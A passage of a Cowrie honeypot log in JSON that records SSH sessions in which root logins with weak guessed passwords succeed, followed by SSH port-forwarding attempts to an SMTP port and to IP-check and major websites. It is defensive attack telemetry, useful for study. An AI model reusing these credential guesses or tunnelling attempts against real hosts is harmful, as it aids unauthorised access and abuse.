"hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:45:02.887274Z","src_ip":"212.227.235.229","session":"25d6668169bf"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa11223344","message":"login attempt [root/Aa11223344] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:45:03.492397Z","src_ip":"212.227.235.229","session":"25d6668169bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-31T08:45:03.621983Z","session":"25d6668169bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-31T08:45:03.751261Z","src_ip":"212.227.235.229","session":"25d6668169bf"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:03.881547Z","src_ip":"212.227.235.229","session":"25d6668169bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33426,"dst_ip":"1.2.3.4","dst_port":22,"session":"34315b0fa38c","protocol":"ssh","message":"New connection: 212.227.235.229:33426 (1.2.3.4:22) [session: 34315b0fa38c]","sensor":"my-vps","timestamp":"2025-08-31T08:45:13.434227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T08:45:13.435025Z","src_ip":"212.227.235.229","session":"34315b0fa38c"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T08:45:13.533470Z","src_ip":"212.227.235.229","session":"34315b0fa38c"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:45:14.025186Z","src_ip":"212.227.235.229","session":"34315b0fa38c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"52.213.114.153","dst_port":443,"src_ip":"212.227.235.229","src_port":55322,"message":"direct-tcp connection request to 52.213.114.153:443 from 127.0.0.1:55322","sensor":"my-vps","timestamp":"2025-08-31T08:45:14.906917Z","session":"34315b0fa38c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"52.213.114.153","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe5\\xcd\\x92\\x0b\\xcdd\\x17\\xf1_\\x03\\xbfQ\\xd0\\xc6e|\\x9b\\xe6\\x7f\\xf5p\\xaf\\x89\\x8f\\x06\\xb8\\x0e6\\x88\\xd2!h \\x94\\xa8z\\xcb\\x81+\\xde9\\x87\\x93\\xf4\\xdfg1\\x81\\xb32\\x0c\\xd9\\x92\\x80\\xf8\\x06\\xe6\\x8b\\xc2\\x94\\xd6Fy\\x03\\xad\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9bGr\\xd3\\xec&j\\xa5\\x05\\x89\\xe4\\xc2\\xb0*\\xaau\\xd2l\\x1a]\\x9b\\xbc\\x14Y8\\xca\\xae94\\xe8|E\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 52.213.114.153:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe5\\xcd\\x92\\x0b\\xcdd\\x17\\xf1_\\x03\\xbfQ\\xd0\\xc6e|\\x9b\\xe6\\x7f\\xf5p\\xaf\\x89\\x8f\\x06\\xb8\\x0e6\\x88\\xd2!h \\x94\\xa8z\\xcb\\x81+\\xde9\\x87\\x93\\xf4\\xdfg1\\x81\\xb32\\x0c\\xd9\\x92\\x80\\xf8\\x06\\xe6\\x8b\\xc2\\x94\\xd6Fy\\x03\\xad\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9bGr\\xd3\\xec&j\\xa5\\x05\\x89\\xe4\\xc2\\xb0*\\xaau\\xd2l\\x1a]\\x9b\\xbc\\x14Y8\\xca\\xae94\\xe8|E\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T08:45:15.025325Z","src_ip":"212.227.235.229","session":"34315b0fa38c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.58.105.51","dst_port":443,"src_ip":"212.227.235.229","src_port":55536,"message":"direct-tcp connection request to 23.58.105.51:443 from 127.0.0.1:55536","sensor":"my-vps","timestamp":"2025-08-31T08:45:15.130442Z","session":"34315b0fa38c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.58.105.51","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03e\\xa5\\x1d\\x82\\xe7h\\xd2\\xfe\\x80\\x05\\xad\\xd0\\xe5F)\\xea\\xdf\\xe4`7\\x92\\x80\\xe7g4\\x15b\\xd2\\x0c\\xe5i\\x9c 9\\xb4q^n3I;0\\xca\\xc3\\x9e\\x1e\\x17d\\x94\\x05+_Kr\\xbd=\\x0e\\x9bM\\xdc\\xb2K\\xd2~X\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xcb\\x95~\\x9c@\\x1a\\xbc\\xdd\\x0b\\xc8\\xaf\\x90]\\nb\\xf2#\\xe0\\x1d\\xb3\\xef\\x85\\x1b2\\x0f\\xef\\xaa\\xfe\\xc9?EN\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.58.105.51:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03e\\xa5\\x1d\\x82\\xe7h\\xd2\\xfe\\x80\\x05\\xad\\xd0\\xe5F)\\xea\\xdf\\xe4`7\\x92\\x80\\xe7g4\\x15b\\xd2\\x0c\\xe5i\\x9c 9\\xb4q^n3I;0\\xca\\xc3\\x9e\\x1e\\x17d\\x94\\x05+_Kr\\xbd=\\x0e\\x9bM\\xdc\\xb2K\\xd2~X\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xcb\\x95~\\x9c@\\x1a\\xbc\\xdd\\x0b\\xc8\\xaf\\x90]\\nb\\xf2#\\xe0\\x1d\\xb3\\xef\\x85\\x1b2\\x0f\\xef\\xaa\\xfe\\xc9?EN\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T08:45:15.252976Z","src_ip":"212.227.235.229","session":"34315b0fa38c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.36.36","dst_port":443,"src_ip":"212.227.235.229","src_port":55702,"message":"direct-tcp connection request to 142.251.36.36:443 from 127.0.0.1:55702","sensor":"my-vps","timestamp":"2025-08-31T08:45:15.355346Z","session":"34315b0fa38c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.36.36","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xf2\\\\|\\x13zM?n\\xf0@\\xaa\\xe1m\\x1dj\\xbd|Bz(\\xcf\\xf0\\xac\\xf7U\\x8eq\\x9e\\xec)*V \\xcd\\x15\\xd6\\xe4\\x04Q\\x9a*\\xcd\\xa8\\x8a\\x0bh\\x95\\x7f\\x02+\\x1b\\x19\\x02\\x9d6\\x91\\x8fr\\x04\\xc8S\\xfb\\x157\\xb6\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 z\\xcdE\\xb0\\xcfL&\\xed\\xb2=9\\x9a\\xaa\\xec\\xb6\\xef\\x03\\x9a\\xccez\\x96\\xb7 \\xd7\\xabB*\\xa8\\x01a\\x1c\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.36.36:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xf2\\\\|\\x13zM?n\\xf0@\\xaa\\xe1m\\x1dj\\xbd|Bz(\\xcf\\xf0\\xac\\xf7U\\x8eq\\x9e\\xec)*V \\xcd\\x15\\xd6\\xe4\\x04Q\\x9a*\\xcd\\xa8\\x8a\\x0bh\\x95\\x7f\\x02+\\x1b\\x19\\x02\\x9d6\\x91\\x8fr\\x04\\xc8S\\xfb\\x157\\xb6\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 z\\xcdE\\xb0\\xcfL&\\xed\\xb2=9\\x9a\\xaa\\xec\\xb6\\xef\\x03\\x9a\\xccez\\x96\\xb7 \\xd7\\xabB*\\xa8\\x01a\\x1c\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T08:45:15.525528Z","src_ip":"212.227.235.229","session":"34315b0fa38c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:15.625285Z","src_ip":"212.227.235.229","session":"34315b0fa38c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49797,"dst_ip":"1.2.3.4","dst_port":23,"session":"d435fbe17f0a","protocol":"telnet","message":"New connection: 212.227.125.160:49797 (1.2.3.4:23) [session: d435fbe17f0a]","sensor":"my-vps","timestamp":"2025-08-31T08:45:20.246942Z"}
